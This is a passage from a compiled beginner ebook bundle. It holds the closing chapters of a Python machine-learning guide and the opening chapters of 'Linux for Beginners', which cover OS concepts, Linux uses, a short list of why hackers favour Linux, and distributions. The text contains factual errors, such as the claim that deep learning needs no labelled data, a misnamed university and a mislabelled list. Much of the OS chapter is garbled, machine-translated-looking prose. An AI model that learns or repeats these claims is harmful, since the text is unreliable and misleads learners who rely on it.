the network to provide output even when the information is insufficient or
incomplete.
c) Having a Distributed Memory – A programmer uses examples to teach
the neural network and get it to produce desired outputs. They train the neural
system by the desired outcome by utilizing as many details as possible. The
example comprises of all the information and sections necessary to ensure
that the network will learn the most. This training provides the system with a
memory that has different relevant details that will allow for the production
of suitable outputs. The better the example in the training process is, the less
likely the neural network is to provide false outputs.
d) Parallel Processing Capability – The networks can carry out several
jobs at the same time due to their numerical advantage. They process several
numerics simultaneously and at a high speed.
e) Storing Information on the Entire Network – The system stores
information on the whole network and not in databases. It enables the system
to continue operating even in cases where a section loses some information
details.
f) Having Fault Tolerance – The network is fault-tolerant in that it can
carry on providing output even in situations where one or more cells decay.
g) Gradual Corruption – Degradation in the network does not take place
abruptly and instantly. It occurs slowly and progressively over a period,
which allows one to use the system despite the corrosion still.
One of the main reasons that we have spent so much of our time taking a look
at machine learning and what we are able to do with it along with Python is
that we want to be able to use this to help us out with data science. Many
companies are diving into the idea of data science and all that this method is
able to do for them, and whether your business is looking to expand to a new
area or you would like to reach more customers or release a new product,
data science will be able to help you out.
Now, there are going to be a few different steps that come with data science
in order to make sure that it is as successful as possible. But overall, it is
going to consist of many machine learning and Python algorithms that will
help us to take our prepared data, and organize it in a way that we are able to
use later on. But there is definitely a lot more that we are able to do with the
help of data science, and we are going to spend a bit of time exploring that
now. In this chapter, we are going to look at a few important steps in this
process including the basics of what data science is all about, how deep
learning comes into play, and how data preparation can be the tool we need
as well.
What is Data Science?
The first topic that we are going to spend some time on here is all about data
science. Data science, to keep things simple, is just a very detailed study that
shows us the flow of information from a large amount of data that a company
has gathered and collected in the hopes of learning something from. In our
modern world, there is information no matter which way we turn. Companies
are able to use this data, and simply by setting up their accounts on social
media or using other methods, they can collect a lot of data from their
customers, and use this in many different manners.
While gathering up all of this different information is important, and may
seem like the only thing a company needs to do, the problem is going to
really show up when we try to figure out the steps that we should take with
all of that data. It doesn’t do us a lot of good to just hold onto that
information without an idea of what we are able to do with it, or even any
ideas on what we will be able to find inside of that data. And because there is
a lot of data, usually more than we realize when we get started, it is hard for
us to simply assign a person, or even a team, to look through that data, and
efficiently and quickly find the patterns and insights that are in that set of
data.
Data science is here in order to handle this kind of problem. It is going to step
in to help us figure out what is found in the information, and even how to
store the information. And with the help of artificial intelligence and machine
learning, which we will talk about a bit later, we will find that data science
will be able to go through the information and find what trends are there,
especially the ones that are hidden.
When it comes to data science, we are going to be able to obtain some
meaningful insights from raw and unstructured data, which is then going to
be processed through skills that are business, programming, and analytical.
Let’s take a look at more about what this data science is all about, why it is
important, and some of the different parts of the data science cycle.
Right now, each day we are going to see 25 quintillion bytes of data
generated for companies to use, and it is going to grow at an even faster rate
as IoT continues to grow this is an extraordinary amount of growth in data,
which can be useful for a lot of companies to learn about their customers,
figure out the best products to release next, and work the best with the
customer service they would like to provide. All of this data is going to come
from a variety of sources that will include:
1. Helping the company learn new ways where they can reduce
costs each day.
2. It can help the company figure out the best method to take to
get into a new market that will be profitable for them.
3. This can help the company learn about a variety of
demographics and how to tap into these
4. It can help the company to take a look at the marketing
campaign that they sent out there and then figure out if the
marketing campaign was actually effective.
5. It can make it easier for the company to successfully launch a
new service product.
We have already spent some time taking a look at the lifecycle that comes
with data science, but to help us learn more about it, and to have a review,
let’s go over the steps. We will need to come up with the main business
problem that we would like to solve and then begin collecting the data that
we want to use. Since this data is going to be found in a lot of different
locations, we will be able to format it, clean it off, and make sure that the
outliers, duplicates, and missing values are taken care of.
From there, we are able to deal with the data through an algorithm. With the
help of the Python coding language and all of the features that it is able to
provide, we will see that there are a ton of algorithms that work well for this
process. We can choose the one that we need, and then do some training and
testing of the information ahead of time to make sure it is ready for making
predictions. We can then finish off the whole thing with some visualizations
that make it easier to see some of the complex relationships and correlations
that happen inside of our data.
From there, we need to move on to some of the components that will show up
in our data science project. There are a lot of components that need to come
together and need to work together to ensure we are actually able to get the
most out of any data science project we are working with.
The first component that we need to spend some time on is to pay attention to
the types of data that we are working with. The raw data that we have is so
important because it is going to be the foundation for all of the other things
that we do through this process. The two main types of data that you are
going to be able to find through this process though will be the structured
data, which is the kind we find in some tabular forms or a data set. And then
we can also have a type of data that is known as unstructured which will
include images, videos, emails, and PDF files to name a few.
The second components that we are going to find when we look at data
science are programming. You have to come up with some programming in
order to make those mathematical models that we talked about earlier and to
get them to really sort through the information and make predictions. All of
the analysis and management of the data is going to be done by computer
programming. The two most popular languages that are used in data science
will include R and Python so learning one of these can be helpful.
Next on the list is going to be probability and statistics. Data is going to be
manipulated in a manner that it is able to extract information and trends out
of that data. Probability and statistics are going to be the mathematical
foundation that brings it all together. Without having a good idea and a lot of
knowledge about these two topics, it is possible that you will misinterpret the
data, and will come up with conclusions that are not correct. This is a big
reason why probability and statistics are going to be so important to the world
of data science.
We also have to take a look at the idea of machine learning when we are
looking at data science. When someone is working through all of that big
data and everything that is contained inside of it, they are also going to use a
lot of the algorithms that come with machine learning. This can include the
methods of classification and regression at the same time.
And the final key component that we need to spend some time on here is the
idea of big data. In the world we live in today, raw data is so important, but
we need to be able to take it and turn it into something that we are actually
able to use. There is a lot of good information in all of that data, but if it is
just sitting there, and we are not able to get all of that information out of it
that we need, then it is going to be worthless to us.
This is where the Python algorithms are really going to come into play. You
will find that when we pick out the algorithms and use the right ones, we can
take all of this raw data, the data that may be a mess, unorganized, and hard
to work with, and can actually turn it into something that we are able to use
and appreciate overall.
There are a lot of different things that we will be able to work with when it
comes to working with data science. There are a lot of parts that come with
data science though. We have to make sure that we know all of the different
parts of the data science process.
Chapter 12 A Quick Look at Deep Learning
Artificial intelligence is a field of study that has come up in many
conversations for years. A few years ago, this was a futuristic concept that
was propagated in movies and comic books. Through years of development
and research, we are currently experiencing the best of artificial intelligence.
In fact, it is widely expected that AI will help us usher in the new frontier in
computing.
Artificial intelligence might share some similarities with machine learning
and deep learning, but they are not the same thing. Many people use these
terms interchangeably without considering the ramifications of their
assumptions. Deep learning and machine learning are knowledge branches of
artificial intelligence. While there are different definitions that have been
used in the past to explain artificial intelligence, the basic convention is that
this is a process where computer programs are built with the capacity to
operate and function like a normal human brain would.
The concept of AI is to train a computer to think the same way a human brain
thinks and functions. In as far as the human brain is concerned, we are yet to
fully grasp the real potential of our brains. Experts believe that even the most
brilliant individuals in the world are unable to fully exhaust their brain
capacity.
This, therefore, creates a conundrum, because if we are yet to fully
understand and test the limits of our brains, how can we then build computing
systems that can replicate the human brain? What happens if computers learn
how to interact and operate like humans to the point where they can fully use
their brainpower before we learn how to use ours?
Ideally, the power behind AI or the limits of its thinking capacity is yet to be
established. However, researchers and other experts in the field have made
great strides over the years. One of the closest examples of AI that espouses
these values is Sophia. Sophia is probably the most advanced AI model in the
world right now. Perhaps given our inability to fully push the limits of our
brains, we might never fully manage to push the limits of AI to a point where
they can completely replace humans.
Machine learning and deep learning are two branches of artificial intelligence
that have enjoyed significant research and growth over the years. The
attention towards these frameworks especially comes from the fact that many
of the leading tech companies in the world have seamlessly implemented
them in their products, and integrated them into human existence. You
interact with these models all the time on a daily basis.
Machine learning and deep learning do share a number of features, but they
are not the same. Just as is the case with comparing these two with artificial
intelligence. In your capacity as a beginner, it is important to learn the
difference between these studies, so that you can seek and find amazing
opportunities that you can exploit and use to further your skills in the
industry. In a world that is continually spiraling towards increased machine
dependency, there are many job openings in machine learning and deep
learning at the moment. There will be so much more in the near future too, as
people rush to adapt and integrate these systems into their daily operations
and lives.
Deep Learning vs Machine Learning
Before we begin, it is important that you remind yourself of the basic
definitions or explanations of these two subjects. Machine learning is a
branch of artificial intelligence that uses algorithms to teach machines how to
learn. Further from the algorithms, the machine learning models need input
and output data from which they can learn through interaction with different
users.
When building such models, it is always advisable to ensure that you build a
scalable project that can take new data when applicable and use it to keep
training the model and boost its efficiency. An efficient machine learning
model should be able to self-modify without necessarily requiring your input,
and still provide the correct output. It learns from structured data available
and keeps updating itself.
Deep learning is a class of machine learning that uses the same algorithms
and functions used in machine learning. However, deep learning introduces
layered computing beyond the power of algorithms. Algorithms in deep
learning are used in layers, with each layer interpreting data in a different
way. The algorithm network used in deep learning is referred to as artificial
neural networks.
The name artificial neural networks gives us the closest iteration of what
happens in deep learning frameworks. The goal here is to try and mimic the
way the human brain functions, by focusing on the neural networks. Experts
in deep learning sciences have studied and referenced different studies on the
human brain over the years, which has helped spearhead research into this
field.
Problem Solving Approaches
Let’s consider an example to explain the difference between deep learning
and machine learning.
Say you have a database that contains photos of trucks and bicycles. How can
you use machine learning and deep learning to make sense of this data? At
first glance, what you will see is a group of trucks and bicycles. What if you
need to identify photos of bicycles separately from trucks using these two
frameworks?
To help your machine learning algorithm identify the photos of trucks and
bicycles based on the categories requested, you must first teach it what these
photos are about. How does the machine learning algorithm figure out the
difference? After all, they almost look alike.
The solution is in a structured data approach. First, you will label the photos
of bicycles and trucks in a manner that defines different features that are
unique to either of these items. This is sufficient data for your machine
learning algorithm to learn from. Based on the input labels, it will keep
learning and refine its understanding of the difference between trucks and
bicycles as it encounters more data. From this simple illustration, it will keep
searching through millions of other data it can access to tell the difference
between trucks and bicycles.
How do we solve this problem in deep learning?
The approach in deep learning is different from what we have done in
machine learning. The benefit here is that in deep learning, you do not need
any labeled or structured data to help the model identify trucks from bicycles.
The artificial neural networks will identify the image data through the
different algorithm layers in the network. Each of the layers will identify and
define a specific feature in the photos. This is the same method that our
brains use when we try to solve some problems.
Generally, the brain considers a lot of possibilities, ruling out all the wrong
ones before settling on the correct one. Deep learning models will pass
queries through several hierarchical processes to find the solution. At each
identification level, the deep neural networks recognize some identifiers that
help in distinguishing bicycles from trucks.
This is the simplest way to understand how these two systems work. Both
deep learning and machine learning however, might not necessarily be
applicable methods to tell these photos apart. As you learn about the
differences between these two fields, you must remember that you have to
define the problem correctly, before you can choose the best approach to
implement in solving it. You will learn how to choose the right approach at a
later stage in your journey into machine learning, which has been covered in
the advanced books in this series.
From the example illustrated above, we can see that machine learning
algorithms need structured data to help them tell the difference between
trucks and bicycles. From this information, they can then produce the correct
output after identifying the classifiers.
In deep learning, however, your model can identify images of the trucks and
bicycles by passing information through several data processing layers in its
framework. There is no need for structured data. To make the correct
prediction, deep learning frameworks depend on the output provided at every
data processing layer. This information then builds up and presents the final
outcome. In this case, it rules out all possibilities to remain with the only
credible solution.
From our illustrations above, we have learned some important facts that will
help you distinguish deep learning from machine learning as you learn over
the years. We can summarize this in the following points:
● Data presentation
The primary difference between machine learning and deep learning is
evident in the way we introduce data into the respective models. With
machine learning models, you will almost always need to use structured data.
However, in deep learning, the networks depend on artificial neural network
layers to identify unique features that help to identify the data.
● Algorithms and human intervention
The emphasis of machine learning is to learn from interacting with different
inputs and use patterns. From such interaction, machine learning models can
produce better output the longer it learns, and the more interaction it receives.
To aid this cause, you must also try to provide as much new data as possible.
When you realize that the output presented is not what you needed, you must
retrain the machine learning model to deliver a better output. Therefore, for a
system that should work without human intervention, you will still have to be
present from time to time.
In deep learning, your presence is not needed. All the nested layers within the
neural networks process data at different levels. In the process, however, the
model might encounter errors and learn from them.
This is the same way that the human brain works. As you grow up, you learn
a lot of important life skills through trial and error. By making mistakes, your
brain learns the difference between positive and negative feedback, and you
strive to achieve positive results whenever you can.
To be fair, even in deep learning, your input will still be required. You cannot
confidently assume that the output will always be perfect. This particularly
applies when your input data is insufficient for the kind of output you
demand from the model.
The underlying factor here is that both machine learning and deep learning
must all use data. The quality of data you have will make a lasting impact on
the results you get from these models. Speaking of data, you cannot just use
any data you come across. To use either of these models effectively, you
must learn how to inspect data and make sure you are using the correct
format for the model you prefer.
Machine learning algorithms will often need labeled, structured data. For this
reason, they are not the best option if you need to find solutions to
sophisticated problems that need massive chunks of data.
In the example we used to identify trucks from bicycles, we tried to solve a
very simple issue in a theoretical concept. In the real world, however, deep
learning models are applied in more complex models. If you think about the
processes involved, from the concepts to hierarchical data handling and the
different number of layers that data must pass through, using deep learning
models to solve simple problems would be a waste of resources.
While all these classes of AI need data to help in conducting the intelligence
we require, deep learning models need significantly wider access to data than
machine learning algorithms. This is important because deep learning
algorithms must prove beyond a reasonable doubt that the output is perfect
before it is passed.
Deep learning models can easily identify differences and concepts in the data
processing layers for neural networks only when they have been exposed to
millions of data points. This helps to rule out all other possibilities. In the
case of machine learning, however, the models can learn through criteria that
are already predetermined.
Different Use Cases
Having seen the difference between machine learning and deep learning,
where can these two be applied in the real world? Deep learning is a credible
solution in case you deal with massive amounts of data. In this case, you will
need to interpret and make decisions from such data, hence you need a model
that is suitable given your resource allocation.
Deep learning models are also recommended when dealing with problems
that are too complicated to solve using machine learning algorithms. Beyond
this, it is important to realize that deep learning models usually have a very
high resource demand. Therefore, you should consider deep learning models
when you have the necessary financial muscle and resource allocation to
obtain the relevant programs and hardware.
Machine learning is a feasible solution when working with structured data
that can be used to train different machine learning algorithms. There is a lot
of learning involved before the algorithms can perform the tasks requested.
You can also use machine learning to enjoy the benefits of artificial
intelligence without necessarily implementing a full-scale artificial
intelligence model.
Machine learning algorithms are often used to help or speed up automation
processes in businesses and industrial processes. Some common examples of
machine learning models in use include advertising, identity verifiers,
information processing, and marketing. These should help your business
position itself better in the market against the competition.
Conclusion
Now that we have come to the end of the book, I hope you have gathered a
basic understanding of what machine learning is and how you can build a
machine learning model in Python. One of the best ways to begin building a
machine learning model is to practice the code in the book, and also try to
write similar code to solve other problems. It is important to remember that
the more you practice, the better you will get. The best way to go about this is
to begin working on simple problem statements and solve them using the
different algorithms. You can also try to solve these problems by identifying
newer ways to solve the problem. Once you get a hang of the basic problems,
you can try using some advanced methods to solve those problems.
Thanks for reading to the end!
Python Machine Learning may be the answer that you are looking for when it
comes to all of these needs and more. It is a simple process that can teach
your machine how to learn on its own, similar to what the human mind can
do, but much faster and more efficient. It has been a game-changer in many
industries, and this guidebook tried to show you the exact steps that you can
take to make this happen.
There is just so much that a programmer can do when it comes to using
Machine Learning in their coding, and when you add it together with the
Python coding language, you can take it even further, even as a beginner.
The next step is to start putting some of the knowledge that we discussed in
this guidebook to good use. There are a lot of great things that you can do
when it comes to Machine Learning, and when we can combine it with the
Python language, there is nothing that we can’t do when it comes to training
our machine or our computer.
This guidebook took some time to explore a lot of the different things that
you can do when it comes to Python Machine Learning. We looked at what
Machine Learning is all about, how to work with it, and even a crash course
on using the Python language for the first time. Once that was done, we
moved right into combining the two of these to work with a variety of Python
libraries to get the work done.
You should always work towards exploring different functions and features
in Python, and also try to learn more about the different libraries like SciPy,
NumPy, PyRobotics, and Graphical User Interface packages that you will be
using to build different models.
Python is a high-level language which is both interpreter based and object-
oriented. This makes it easy for anybody to understand how the language
works. You can also extend the programs that you build in Python onto other
platforms. Most of the inbuilt libraries in Python offer a variety of functions
that make it easier to work with large data sets.
You will now have gathered that machine learning is a complex concept that
can easily be understood. It is not a black box that has undecipherable terms,
incomprehensible graphs, or difficult concepts. Machine learning is easy to
understand, and I hope the book has helped you understand the basics of
machine learning. You can now begin working on programming and building
models in Python. Ensure that you diligently practice since that is the only
way you can improve your skills as a programmer.
If you have ever wanted to learn how to work with the Python coding
language, or you want to see what Machine Learning can do for you, then
this guidebook is the ultimate tool that you need! Take a chance to read
through it and see just how powerful Python Machine Learning can be for
you.
LINUX FOR BEGINNERS:
THE PRACTICAL GUIDE TO
LEARN LINUX OPERATING
SYSTEM WITH THE
PROGRAMMING TOOLS FOR
THE INSTALLATION,
CONFIGURATION AND
COMMAND LINE + TIPS ABOUT
HACKING AND SECURITY.
JOHN S. CODE
© Copyright 2019 - All rights reserved.
The content contained within this book may not be reproduced,
duplicated or transmitted without direct written permission from
the author or the publisher.
Under no circumstances will any blame or legal responsibility be
held against the publisher, or author, for any damages, reparation,
or monetary loss due to the information contained within this book.
Either directly or indirectly.
Legal Notice:
This book is copyright protected. This book is only for personal
use. You cannot amend, distribute, sell, use, quote or paraphrase
any part, or the content within this book, without the consent of the
author or publisher.
Disclaimer Notice:
Please note the information contained within this document is for
educational and entertainment purposes only. All effort has been
executed to present accurate, up to date, and reliable, complete
information. No warranties of any kind are declared or implied.
Readers acknowledge that the author is not engaging in the
rendering of legal, financial, medical or professional advice. The
content within this book has been derived from various sources.
Please consult a licensed professional before attempting any
techniques outlined in this book.
By reading this document, the reader agrees that under no circumstances is
the author responsible for any losses, direct or indirect, which are incurred as
a result of the use of information contained within this document, including,
but not limited to, — errors, omissions, or inaccuracies.
Table of Contents
Introduction
Chapter 1 Basic Operating System Concepts, Purpose and
Function
Chapter 2 Basics of Linux
Chapter 3 What are Linux Distributions?
Chapter 4 Setting up a Linux System
Chapter 5 Comparison between Linux and other Operating
Systems
Chapter 6 Linux Command Lines
Chapter 7 Introduction to Linux Shell
Chapter 8 Basic Linux Shell Commands
Chapter 9 Variables
Chapter 10 User and Group Management
Chapter 11 Learning Linux Security Techniques
Chapter 12 Some Basic Hacking with Linux
Chapter 13 Types of Hackers
Conclusion
Introduction
If you have picked up this book, you are inevitably interested in Linux, at
least to some degree. You may be interested in understanding the software, or
debating whether it is right for you. However, especially as a beginner, it is
easy to feel lost in a sea of information. How do you know what version of
Linux to download? Or how to even go about downloading it, to begin with?
Is Linux even right for you to begin with? All of those are valid questions,
and luckily for you, Linux for Beginners is here to guide you through all of it.
Linux is an operating system, much like iOS and Windows. It can be used on
laptops, large computer centers, on cell phones, and even smart fridges. If it
can be programmed, Linux can almost definitely be installed, thanks to
several features and benefits. Linux is small, secure, supported on other
devices, and incredibly easy to customize. With Linux, you can create a setup
that is exactly what you want, with privacy, security, and access to plenty of
free to use software. This means that, once you develop the knowhow, you
can create a customized experience that will do exactly what you need,
allowing yourself to optimize the setup you have and ensure that the setup
you have
As you read through this book, you will be given a comprehensive guide to
everything you need to know as a beginner to Linux. You will learn about
why and how to determine which distribution of Linux is right for you. You
will discover how to use the terminal, how to set up exactly what you will
need on your system, and more.
When you are able to make your customized setup however you see fit, this
means that you can make sure that you are always working within the
constraints of the hardware that you are using. This means that older
machines, which may struggle under a load of many modern operating
systems such as Windows 10, can be optimized and used to their fullest
potential without wasting valuable resources or processing power on aspects
that are unnecessary, redundant, or even just detrimental to whatever it is that
you need to do.
Ultimately, you will be provided with exactly what you need to know to get
started with Linux, from start to finish. You will even be provided with
several alternatives to Windows-specific applications that can be downloaded
and used while running Linux on your device. Everything will be provided in
the simplest terms possible, so you get a complete and thorough
understanding of exactly what you need to know if you wish to get started
with Linux. Between receiving several step-by-step guides, questions, and
lists of commands, you should have much of what you need to know to at
least get started with the installation of your own distribution of Linux!
Enjoy the journey!
Chapter 1 Basic Operating System Concepts,
Purpose and Function
Purpose of the Operating System
Operating systems provide us with a score of cybernetic system, and
secondly, efficiency and reliability of its work. The first function is
characteristic of the OS as an extended machine, the second - the OS as a
distributor of hardware resources.
Operating System as an Extended Machine
Using the operating system, the application programmer (and through his
programs and the user) should have the impression that they are working with
an advanced machine. The hardware is not well adapted for direct use in
applications. For example, if you consider working with I / O devices at the
command level of the respective controllers, you can see that the set of such
commands is limited, and for many devices - primitive. The operating system
hides such a hardware interface but instead offers the programmer an
application programming interface that uses higher-level concepts (called
abstractions).
For example, when working with a disk, a typical abstraction is a file. it is
easier to work with files than directly with a disk controller (no need to
consider moving the drive heads, starting and stopping the motor, etc.), as a
result, the programmer can focus on the essence of his application. The
operating system is responsible for interacting with the disk controller.
Abstraction highlighting makes it easy for OS and application code to change
when migrating to new hardware. For example, if you install a new type of
disk device on your computer (provided that it is supported by the OS), all its
features will be taken into account at the OS level, and applications will
continue to use the files as before. This characteristic of the system is
called hardware independence. OS can be said to provide a hardware-
independent environment for executing applications.
Operating System as a Resource Allocator
The operating system must allocate resources efficiently. It acts as the
manager of these resources and provides them to applications on demand.
There are two main types of resource allocation. In the case of the spatial
distribution of resource access will be for multiple customers simultaneously,
and each one of them can use the resources (the shared memory). In the case
of temporal distribution, the system queues and, according to it, allows them
to use the entire resource for a limited time (so the processor is distributed in
single-processor systems).
When allocating resources, the OS resolves possible conflicts, prevents
unauthorized access of programs to those resources, on which they have no
rights, ensures the efficient operation of the computer system.
Classification of Modern Operating Systems
Consider the classification of modern operating systems, depending on their
scope. First of all, note the OS of large computers (mainframes). The main
characteristic of the hardware for which they are designed is the performance
of I / O: large computers provide a large number of peripherals (disks,
printers, terminals, etc.). Such a computer cybernetic system is used for the
reliable processing of large amounts of data. This OS should effectively
support this process (in batch mode or time allocation). An example of an OS
of this class would be IBM's OS /390.
The following category includes server operating systems. The main feature
of such operating systems is the ability to serve a large number of user
requests for shared resources. Network support plays an important role for
them. There are specialized server OSes that exclude elements that are not
related to the performance of their basic functions (for example, support for
user applications). Universal servers ( UNIX or Windows XP systems )
are now more commonly used to implement servers.
The most massive category is personal OS. Some operating systems in this
category, developed with the expectation of the user (Windows 95/98 / Me)
by Microsoft are simplified versions of the universal OS. Particular attention
in the personal OS is given to the support of the graphical user interface and
multimedia technologies.
There is also a real-time OS. In such a system, each operation must be
guaranteed to be performed within a specified time range. Real-time OS can
control the flight of a spaceship, process or video demonstration. There are
specialized real-time OSes such as QNX and VxWorks.
Another category is embedded OS. These include managing applications for
various microprocessor systems used in military technology, consumer
electronics systems, smart cards, and other devices. Such systems pose
special requirements: placing a small amount of memory and support for
specialized OS devices. Often, built-in OS is developed for a specific
device; universal systems include embedded Linux and Windows CE.
Functional Components of Operating Systems
An operating system can be considered as a set of components, each of which
is responsible for the implementation of a specific function of the
system. Consider the most important features of the modern OS and the
components that implement them.
The way the system is built from components and their relationship is
determined by the architecture of the operating system. Each operating
system is going to be a bit different in the kind of work that it can handle, and
its organizational structure, so learning this and how to put it all together can
be important.
Process and Flow Management
One of the most important functions of OS is to execute applications. Code
and application data is stored in the computer cybernetic system on disk in a
special executable manner. After the user decides to run either OS to perform
a file system creates the basic unit of a computer, called a process. You can
specify the following: a process is a program that executes it.
The operating system allocates resources between processes. These resources
include CPU time, memory, devices, disk space as files. For the allocation of
memory of each process, undertake its address space - set address memory,
which allows you access. The process space is stored in the address
space. The allocation of disk space for each process formed a list of open
files similarly.
The processes protect the resources they possess. For example, the process
address space cannot be accessed directly from other processes (it is secure),
and when working with files, a mode can be specified that denies access to
the file to all processes except the current one.
The allocation of processor time between processes is necessary because the
processor executes instructions one by one (ie, at a particular time, only one
process can physically execute on it), and for the user, the processes should
appear as sequences of instructions executed in parallel. To achieve this
effect, the OS provides the processor with each process for a short time, after
which it switches the processor to another process; in this case, the execution
of the processes resume from the place where they were interrupted. In
a multiprocessor system, processes can run in parallel on different processors.
Modern operating systems in addition to processes can support multitasking,
which provides in the process, the presence of several sequences of
instructions (threads), which run in parallel to the user, like most processes in
the OS. Unlike processes, threads do not provide resource protection (for
example, they share the address space of their process).
Memory Management
While executing the code, the processor takes instructions and data from the
computer's (main) memory. This memory is displayed as an array of bytes,
each of which has an address.
The main memory is a type of resource between processes. OS is responsible
for the allocation of memory. The address space is protected during the
process and released only after the execution process is completed. The
amount of memory available to the process can vary in the course of the
distribution of memory.
OS must be capable of programs, individually or in the aggregate amount
available for the main memory. To this end, virtual memory technology must
be realized. This technology allows placing in the main memory only those
instructions and processes that are needed at the current time, while the
contents of the rest of the address space are stored on disk.
I / O Management
The operating system is responsible for managing I / O devices connected to
the computer's memory. Support for such devices in the OS is usually
performed at two levels. The first lower level includes device drivers -
software modules that control devices of a particular type, taking into account
all their features. The second level includes a versatile I / O interface
convenient for use in applications.
The OS should implement a common I / O driver interface through which
they interact with other system components. This interface makes it easy to
add drivers for new devices. Modern OSes provide a large selection of ready-
made drivers for specific peripherals. The more devices the OS supports, the
more chance it has of practical use.
File Management and File Systems
For OS users and programmers, disk space is provided as a set
of files organized into a file system. A file is a set of files on a file system that
can be accessed by name. The term "file system" can be used for two
concepts: the principle of organizing data in the form of files and a specific
set of data (usually the corresponding part of the disk) organized in
accordance with this principle. As part of the OS, it can be implemented
simultaneously supported and ICA several file systems.
File systems are considered at the logical and physical levels. The logical
level defines the external representation of the system as a collection of files
(usually located in directories), as well as performing operations on files and
directories (creation, deletion, etc.). The physical layer defines the principles
of allocation of data structures of the file system on the drive.
Network Support
Network systems
Modern operating systems are adapted to work on the network, they are
called network operating systems. Networking support enables the OS to:
❖ To make local resources (disk space, printers, etc.) publicly available
over the network, ie to function as a server
❖ Refer to other computer resources through a network that is
functioning as a client
Implementing the functionality of server and client based
on vehicles responsible for the transmission of data between computers
according to the rules specified network protocols.
Distributed systems
Network OSes do not hide the presence of a network from the user. The
network support in them does not determine the structure of the system and
enriches it with additional capabilities. There are also distributed OSs that
allow pooling the resources of several computers in a distributed system. It
appears to the user as one computer with multiple processors working in
parallel. Distributed and multiprocessor systems are two major categories of
OS that use multiple processors.
Data security
Data security in the OS means ensuring the reliability of the system (data
protection against loss in case of failure) and protection of data against
unauthorized access (accidental or intentional). To protect against
unwarranted access, the OS should ensure the availability
of authentication of users (such means allow to determine whether the users
are actually who they say they are. This is usually used for system
passwords) and their authorization (to verify user rights which have been
authenticated to perform a specific operation).
User Interface
There are two types of user interaction means running: shell ( shell ) and a
graphical user interface ( GUI ). The command interpreter enables users to
interact with the OS using a special command language (online or through
startup) to execute batch files. Commands of this language force the OS to
perform certain actions (for example, run applications, work with files).
The graphical user interface allows it to interact with the OS by opening
windows and executing commands with menus or buttons. There are many
approaches to implementing a GUI: for example, in Windows systems, its
support systems are built into the system, and in UNIX, they are external to
the system and rely on standard I / O controls.
Conclusions
❖ An operating system is a level of software that lies between the levels
of applications and computer hardware. Its main purpose - to make use of
computer systems easier and improve efficiency.
❖ The main functional components of the OS include process
management, memory management, I / O management, file management and
file system support, network support, data protection, user interface
implementation.
Chapter 2 Basics of Linux
Linux provides a complete operating system with the lowest level of
hardware control and resource management of complete architecture. This
architecture follows the good tradition of UNIX for decades and is very
stable and powerful. In addition, since this excellent architecture can run on
the current PC (X86 system), many software developers have gradually
transferred their efforts to this architecture. So due to this reason the Linux
operating system also has a lot of applications.
Although Linux is only the core system and the tools being provided by the
core structure the integration of the core and the tools with the software
provided by the software developers makes Linux a more complete and
powerful operating system.
Why Linux Matters?
Now that we know what Linux is, let's talk about what Linux is currently
used for. Because the Linux kernel is so small and delicate, it can be executed
in many environments that emphasize power savings and lower hardware
resources. Because Linux distributions integrates a lot of great software
(whether proprietary or free), Linux is also quite suitable for the current use
of personal computers. Traditionally, the most common applications for
Linux can be roughly divided into enterprise applications and personal
applications, but the popularity of the cloud computing mechanism in recent
years seems to make Linux even more powerful. In the below section we
explain about the few Applications of Linux in real life.
Utilization of the Enterprise Environment
The goal of digitalization is to provide consumers or employees with
information about products (such as web pages) and to integrate data
uniformity across the enterprise (such as unified account management / File
Management Systems). In addition, some businesses, such as the financial
industry, emphasize key applications such as databases and security
enhancements have adopted Linux in their environments.
Web Server:
This is currently the most popular application for Linux. Inherited by the
UNIX high stability good tradition, Linux when used for the network
function is particularly stable and powerful. In addition to this because of the
GNU project and the GPL model of Linux, many excellent software is
developed on Linux, and these server software on Linux are almost free
software. Therefore, as a web Server protocols such as WWW, Mail
receiving Server, File transfer Server and so on, Linux is absolutely the best
choice. Of course, this is also the strength of Linux and is the main reason for
its popularity among programmers and network engineers. Due to the strong
demand for Linux server many hardware vendors have to specify the
supported Linux distributions when launching their products.
Mission critical applications (financial databases, Large Enterprise
Network Management Environment)
Due to the high performance and low price of personal computers, the
environment of finance and large enterprises in order to fine-tune their own
machines along with so many enterprises had gradually move to Intel-
compatible X86 host environment. In addition, the software that these
enterprises use is the software that uses UNIX operating system platform
mostly.
High performance computing tasks for academic institutions:
Academic institutions often need to develop their own software, so the
operating system as a development environment for the demand is very
urgent. For example, the Harvard University of Science and technology,
which has a very multi-skill system, needs this kind of environment to make
some graduation projects. Examples include fluid mechanics in engineering,
special effects in entertainment, working platforms for software developers,
and more. Linux has a lot of computing power due to its creator being a
computer performance freak, and Linux has a wide range of supported GCC
compilers, so the advantages of Linux in this area are obvious.
Why Linux is better than Windows for hackers?
1. Open source
Open source is the software whose content is open to the public. Some can be
even modified if you have skills and you can redistribute them with your own
features. Open source Software and operating systems help people to help
excel in their skillset. Being open source installation of Linux is free unlike
windows, which charges a lot of money.
2. Freedom
Hackers need freedom. Linux is free anyway. The content of the program is
open and you can freely go around. On the other hand, it is easy to break it,
but it's also fun. Freedom is great. You can make adjustments as you like, and
you are free to customize your own or your company requirements. And
every time it’s flexible. Whereas Windows restricts its users in many areas.
3. Used in servers
Not only that Linux is free but it is also lightweight and can work well when
combined with a server. Red hat the famous server software is a Linux
distribution. Many hosting companies and websites use Linux for their
servers and being a hacker who follows client server model to attack targets
Linux is very convenient and flexible.
4. Many types
The best thing about Linux is the number of choices you can make in the
form of distributions. Hackers can use distributions like Kali and Parrot
which are preinstalled with hacking tools to enhance their performance which
otherwise is a very tedious work to install every software in Windows.
5. Light
Linux Operating system is very light weight and will go through very less
lags and power shutdowns when compared to windows. As a hacker, we have
to do a lot of work in different terminals so a fast and light environment like
Linux is important for smooth performance.
6. Stable Operation
However, Linux actually works quite stably. Network functions and security
are well thought out, so you can have something strong. Being able to use it
at ease is also a feature of Linux. In fact, many corporate sites and web
services are running on Linux. Given these, you can see that it is a reliable
OS.
Chapter 3 What are Linux Distributions?
When you get Linux for your computer, you are essentially getting Linux
distribution. Just like other popular operating systems, you get an installation
program that consists of the kernel, a graphical user interface, a desktop, and
a bunch of applications that you can readily use once you installed Linux in
your computer. The added bonus is that you also get the opportunity to get
your hands on the source code for the kernel and the applications that you
get, which allows you to tweak them the way you want them to operate in the
future.
While you can add desktop environments, apps, and drivers that don’t come
with your distribution, you will need to find the distribution that will give you
the ideal setup that you have in mind. Doing so will save you the time that
you may need to spend on finding apps and other programs that will work
best with the Linux that you have installed, which can get in the way of
setting up the system just the way you want it.
What Comes with a Distro?
1. GNU software
Most of the tasks that you will be performing using Linux involve GNU
